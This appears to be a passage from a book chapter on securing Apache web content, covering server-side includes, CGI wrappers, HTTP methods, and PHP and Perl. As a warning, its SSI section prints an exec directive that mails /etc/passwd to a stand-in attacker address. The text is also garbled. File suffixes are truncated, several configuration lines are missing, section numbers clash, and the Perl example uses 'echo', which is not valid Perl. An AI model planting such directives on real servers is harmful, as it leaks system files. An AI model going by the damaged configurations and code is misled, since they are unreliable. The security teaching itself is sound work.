10.3. Web ContentAfter you've thoroughly configured Apache's configuration, you can finally deal with web content. 10.3.1. Static ContentStatic content includes HTML, JavaScript, Flash, images, and other files that are served directly by the web server without interpretation. The files and their directories need to be readable by the user ID running Apache (apache, in our examples).Static files don't pose much of a security threat on the server side. The web server just reads them and sends them to the requesting browser. Although there are many security issues with web browsers, client security is outside the scope of this chapter. Watch your browser vendor's web site for security news, patches, and new versions. 10.3.2. Dynamic Content: Server-Side Includes (SSI)A step up from purely static pages, server-side includes allow inclusion of other static content, special dynamic content such as file-modification times, and even the output from the execution of external programs. Unlike CGI scripts, there is no way to pass input arguments to an SSI page. 10.3.2.1 SSI configurationApache needs to be told that an SSI file is not a lump of inert HTML, but should be parsed for SSI directives. First, check that includes are permitted for at least some files in this directory. Add this to httpd.conf or access.conf: <Location /ssi_dir> Options IncludesNoExec </Location> One way to differentiate HTML from SSI files is to use a special suffix such as .shtml and associate it with Apache's built-in MIME type for parsable content: AddType application/x-server-parsed .shtml or just assign the Apache handler directly: AddHandler server-parsed .shtml Using this tells the world that your pages use server-side includes. If you'd like to conceal this fact, use another suffix. One trick I've seen is to use l for static text and for SSI text: AddHandler server-parsed A little-known feature of Apache is its ability to use the execute bit of a file to indicate that it should be parsed. I've used this to mix static and parsed HTML files in the same directory with the same suffix. The directive is as follows: <Location /ssi_dir> Options +IncludesNoExec XBitHack full </Location> The extra attribute full tells Apache to check the modification time of the included file rather than the including file. To change an HTML file into an SSI file, make it executable: chmod +x changelingl A visitor to the web site can't tell if the file is plain HTML or SSI. 10.3.2.2 Including filesThe most basic use of SSI is for inclusion of static files. For example, a site can include a standard header and footer on each page: <!--#include virtual="headerl"--> . . . variable content goes here . . . <!--#include virtual="footerl"--> You can also include the output of a local CGI script by giving its relative URL: <!--#include virtual="/cgi-bin/script"--> 10.3.2.3 Executing commandsIf Options Includes is set, you can also execute any external command on the web server, which is quite dangerous. The following is a benign example: <!--#exec cmd="ls -l /"--> SSI can't get arguments from the client, so any command and arguments are fixed. Since you specify the commands, you might feel safe. However, anyone with write access to /ssi_dir could upload an HTML file containing an SSI #exec string: <!--#exec cmd="mail evil@weasel.org < /etc/passwd"--> If you allow people to upload HTML (say, in a guestbook application), you should forbid SSI execution in the target directory and untaint the input (see the Section 10.4.1 section).Similar vulnerabilities have been seen in utilities that create HTML, such as email digesters and web-log analyzers. If you must have SSI but don't need executable external commands, always exclude them: <Location /ssi_dir> Options IncludesNoExec </Location>
10.3.3. Dynamic Content: Common Gateway Interface (CGI)The CGI is a protocol for sending queries and data via HTTP to a program on the web server. A CGI program can be written in any language, interpreted or compiled. Surprisingly, there is still no final RFC that defines CGI. CGI 1.1 is described at http://hoohoo.ncsa.uiuc.edu/cgi/interfacel. Also, see The CGI Programming MetaFAQ (http://www.perl.org/CGI_MetaFAQl).PHP, JSP, mod_perl, and other active web technologies all use the CGI standard for web client-server communication. 10.3.3.1 Standalone and built-in CGI interpretersThe CGI protocol doesn't specify how the web server should communicate with the CGI program. There have been two main solutions: Standalone CGI programs Apache receives a CGI request, opens a two-way pipe to an external program, sends it the CGI input data, and returns the program's output to the client. As a separate process, the program can crash without bringing down the web server. The downside is that it's relatively slow to start a new process. Built-in CGI programs The program is rewritten as an Apache module and incurs its startup cost only when an Apache process starts. This is much faster than an external program and has access to Apache's internals and other modules. The most popular modules for CGI in Apache are the interpreter engines for Perl (mod_perl) and PHP (mod_php). Whether run in-process (built-in) or independently, CGI programs represent a large security risk. We'll cover a number of them, starting with the problem of securing CGI programs for different users.Normally, CGI programs will all be run with Apache's user ID and group. If you have multiple users and virtual hosts, this lets them run each other's scripts and access each other's data. A web-hosting service might want to let its customers run their own CGI scripts but no one else's. Another site might restrict database access to certain users, requiring scripts to be run as those users. The most common solutions are suEXEC and cgiwrap. 10.3.3.2 suEXECsuEXEC is a setuid root program that wraps scripts to run with a specified user ID and group ID, rather than the Apache server user and group. Scripts need to pass a number of security guidelines before they will be accepted. To use suEXEC, define a VirtualHost section of an Apache configuration file. For Apache 1.3, specify the desired CGI User and Group: <VirtualHost www.hackenbush.com> User hugo Group whyaduck </VirtualHost> Specify SuExecGroup for Apache 2.0: <VirtualHost www.hackenbush.com> SuExecUserGroup hugo whyaduck </VirtualHost> CGI scripts should be placed in directories for this virtual host that permit script execution (by default, ~/public_html/cgi-bin), and they should be owned by user hugo, group whyaduck. For details, see http://httpd.apache.org/docs/suexecl. 10.3.3.3 CgiwrapCgiwrap is also a setuid root program that wraps CGI programs, but works quite differently from suEXEC. Its installation and use are a bit complex, described at http://cgiwrap.sourceforge.net/. 10.3.3.4 FastCGIsuEXEC and Cgiwrap are used with external CGI programs. FastCGI is an alternative for creating CGI programs without the startup time of a standalone program, but also without the complexity of an Apache module. The protocol is language-independent, and libraries are available for the most common web languages. Details are available at http://www.fastcgi.com.FastCGI falls somewhere between standalone and module-based CGI. It starts an external CGI program but maintains a persistent connection through the Apache module mod_fastcgi.Scripts need slight modification to work with FastCGI. You must have set Options ExecCGI in httpd.conf to enable a FastCGI application, just as you would any other CGI program. If you want to allow use of suEXEC with FastCGI, set FastCGIWrapper On. FastCGI scripts are vulnerable to the same problems as any CGI scripts. 10.3.3.5 Specifying CGI programsThere are a couple of ways to tell Apache to treat a file as a CGI script rather than a static file.Treat every file within a directory as a CGI script: ScriptAlias /cgi-bin /usr/local/apache/cgi-bin
Options ExecCGI </Directory> Mixing static files and scripts is dangerous, since a configuration typo could cause Apache to treat a script file as a normal file and allow users to view its contents. This could reveal passwords or other sensitive information. If you do mix files and scripts, you need to tell Apache which files are CGI scripts and which are static files. Use a file suffix or some other naming convention to mark the script. We'll see how to protect files shortly.
them as CGI scripts. Consider using suEXEC (described earlier in this chapter) or limiting CGI scripts to directories where you can see them. 10.3.3.6 HTTP, URLs, and CGIJust as a little SMTP knowledge aids understanding of email-security issues, a little background on HTTP and URLs improves knowledge of web security.Every exchange between a web client and server is defined by the Hypertext Transfer Protocol (HTTP). HTTP 1.0 was the first widely used version, but it had some shortcomings. Most of these were addressed with HTTP 1.1, the current version that is almost universal. HTTP 1.1 is defined in RFC 2616 (http://www.w3.org/Protocols/rfc2616/rfc2616l). The web client makes HTTP requests, and the web server responds. Web browsers hide much of the data exchange, such as MIME types, cache settings, content negotiation, timestamps, and other details. Other clients (such as a web spider, wget, or curl) offer much more control over the exchange.An HTTP request contains an initial request line: Method URI HTTP-Version Methods include OPTIONS, GET, HEAD, POST, PUT, TRACE, DELETE, and CONNECT. Some methods have a corresponding URL format.This line may be followed by request header lines containing information about the client, the host, authorization, and other things. These lines are followed by a blank line, then the message body. The web server returns a header and an optional body, depending on the request.The URL types you use have security implications. Since the protocol is text, it's easy to forge headers and bodies (although attackers have also successfully forged binary data for years). You can't trust what you're being told, whether you're a web server or a client. See section 15 of RFC 2616 for other warnings.The following are the most common methods and some security implications. 10.2.2.2.8 HEAD methodDo you want to know what web server someone is running? It's easy. Let's look at the HEAD data for the home page at http://www.apache.org: $ telnet www.apache.org 80 Trying 63.251.56.142... Connected to daedalus.apache.org (63.251.56.142). Escape character is '^]'. HEAD / HTTP/1.1 Host: www.apache.org HTTP/1.1 200 OK Date: Sat, 13 Apr 2002 03:48:58 GMT Server: Apache/2.0.35 (Unix) Cache-Control: max-age=86400 Expires: Sun, 14 Apr 2002 03:48:58 GMT Accept-Ranges: bytes Content-Length: 7790 Content-Type: text/html Connection closed by foreign host. $ (A handy alternative to this manual approach is the curl client, available from http://www.haxx.se.) The actual responses vary by web server and site. Some don't return a Server: response header, or say they're something else, to protect against attacks aided by port 80 fingerprinting. The default value returned by Apache includes the identity of many modules. To return only a Server: Apache response, specify: ServerTokens ProductOnly 10.2.2.2.9 OPTIONS methodIf OPTIONS is supported, it tells us more about the web server: $ telnet www.apache.org 80 Trying 63.251.56.142... Connected to daedalus.apache.org (63.251.56.142). Escape character is '^]'. OPTIONS * HTTP/1.1 Host: www.apache.org HTTP/1.1 200 OK Date: Sat, 13 Apr 2002 03:57:10 GMT Server: Apache/2.0.35 (Unix) Cache-Control: max-age=86400 Expires: Sun, 14 Apr 2002 03:57:10 GMT Allow: GET,HEAD,POST,OPTIONS,TRACE Content-Length: 0 Content-Type: text/plain Connection closed by foreign host. $ The OPTIONS method is not a security concern, but you might like to try it on your own servers to see what it returns. 10.2.2.2.10 GET methodGET is the standard method for retrieving data from a web server. A URL for the GET method may be simple, like this call for a home page: http://www.hackenbush.com/ A GET URL may be extended with a ? and name=value arguments. Each instance of name and value is URL encoded, and pairs are separated by an &: http://www.hackenbush.com/cgi-bin/groucho.pl?day=jan%2006&user=zeppo An HTTP GET request contains a header but no body. Apache handles the request directly, assigning everything after the ? to the QUERY_STRING environment variable. Since all the information is in the URL itself, a GET URL can be bookmarked or repeated from the browser, without resubmitting a form. It can also be generated easily by client-side or server-side scripting languages.Although you may see some very long and complex GET URLs, web servers may have size limits that silently snip your URL. Apache guards against GET buffer overflow attacks, but some other web servers and web cache servers may not.Since all the parameters are in the URL, they also appear in the web-server logs. If there is any sensitive data in the form, a POST URL should be used.The ? and /cgi-bin advertise that this URL calls a CGI script called groucho.pl. You may want the benefits of a GET URL without letting everyone know that this is a CGI script. If an attacker knows you're using Perl scripts on Apache, for instance, he can target his attack more effectively. Another reason to hide the invocation of a script involves making the URL more search-engine friendly. Many web search engines skip URLs that look like CGI scripts. One technique uses the PATH_INFO environment variable and Apache rewriting rules. You can define a CGI directory with a name that looks like a regular directory: ScriptAlias /fakedir/ "/usr/local/apache/real_cgi_bin/" Within this directory, you could have a CGI script called whyaduck. When this URL is received: http://www.hackenbush.com/fakedir/whyaduck/day/jan%2006/user/zeppo Apache will execute the CGI script /usr/local/real-cgi-bin/whyaduck and pass it the environment variable PATH_INFO with the value /day/jan 06/user/zeppo. Your script can parse the components with any method you like (use split in Perl or explode in PHP to split on the slashes).Since GET requests are part of the URL, they may be immortalized in server logs, bookmarks, and referrals. This may expose confidential information. If this is an issue, use POST rather than GET. If you don't specify the method attribute for a <form> tag in HTML, it uses GET. 10.2.2.2.11 POST methodPOST is used to send data to a CGI program on the web server. A URL for the POST method appears bare, with no ? or encoded arguments. Data are sent in the HTTP body to Apache, then from Apache to the standard input of the CGI program.A user must resubmit her original form and data to refresh the output page, because the recipient has no way of knowing if the data may have changed. (With a GET URL, everything's in the URL.) The POST data size is not as limited as with GET. Normally POST data is not logged, although you can configure Apache to do so. A POST URL cannot be bookmarked, and it cannot be automatically submitted from a browser without using client-side JavaScript (other clients such as wget and curl can submit POST requests). You need to have a button or other link with a JavaScript URL that submits a form that is somewhere on your page. 10.2.2.2.12 PUT methodThis was the original HTTP upload mechanism. Specify a CGI script to handle a PUT request, as you would for a POST request. PUT seems to have been superseded by WebDAV and other methods, which are described in Section 10.4.4. 10.2.2.2.13 TRACE methodThe TRACE method was intended as a debugging tool, but almost no one has heard of it or used it. It was a matter of time until someone found an exploit (http://www.kb.cert.org/vuls/id/867593) and recommended disabling TRACE processing in Apache. The environment required for the exploit to work is so specific that this doesn't appear to be necessary. 10.3.3.7 CGI languagesAny language can be a CGI language just by following the CGI specification. An HTTP response requires at least an initial MIME type line, a blank, and then content. Here's a minimal CGI script written in the shell: #!/bin/sh echo "Content-type: text/html" echo echo "Hello, world" Technically, we should terminate the first two echo lines with a carriage-return-line feed pair ('\r\n\r\n'), but browsers know what to do with bare Unix-style line feeds.Although a C program might run faster than a shell or Perl equivalent, CGI startup time tends to outweigh that advantage. I feel that the best balance of flexibility, performance, and programmer productivity lies with interpreted languages running as Apache modules. The top languages in that niche are PHP and Perl.In the following section on web applications, I'll discuss the security trouble spots to watch, with examples from Perl and PHP. But first, a few words about the PHP and Perl languages may be helpful. 10.2.2.2.14 PHPPHP is a popular web-scripting language for Unix and Windows. It's roughly similar to, and competes with, Visual Basic and ASP on Windows. On Unix and Linux, it competes with Perl and Java. Its syntax is simpler than Perl's, and its interpreter is small and fast.
and end tags: <?php ... ?> <? ... ?> <% ... %> PHP files can contain any mixture of normal HTML and PHP, like this (echo prints its arguments): <? echo "<b>string<b> = <I>$string</I>\n"; ?> or more compactly mixing HTML and PHP (=$string is PHP shorthand for echo $string): <b>string</b> = <i><?=$string?></i> PHP configuration options can be specified in three ways: The php.ini file, normally in the /usr/local/lib directory. Here's an example that disables PHP error displays: display_errors = off The Apache configuration files, in the styles shown in Table 10-6.
error display: php_admin_flag display_errors off These can be placed within container directives to customize PHP settings for different directories or virtual hosts. php_value and php_flag may also be used in .htaccess files. Some directives (see http://www.php.net/manual/en/function.ini-set) can be set in the PHP script at runtime: ini_set("display_errors", "0"); 10.2.2.2.15 PerlPerl is the mother of all web-scripting languages. The most popular module for CGI processing, CGI.pm, is part of the standard Perl release.Here's a quick Perl script to get the value of a form variable (or handcrafted GET URL) called string: #!/usr/bin/perl -w use strict; use CGI qw(:standard); my $string = param("string"); echo header; echo "<b>string</b> = <I>$string</I>\n"; A Perl CGI script normally contains a mixture of HTML print statements and Perl processing statements. |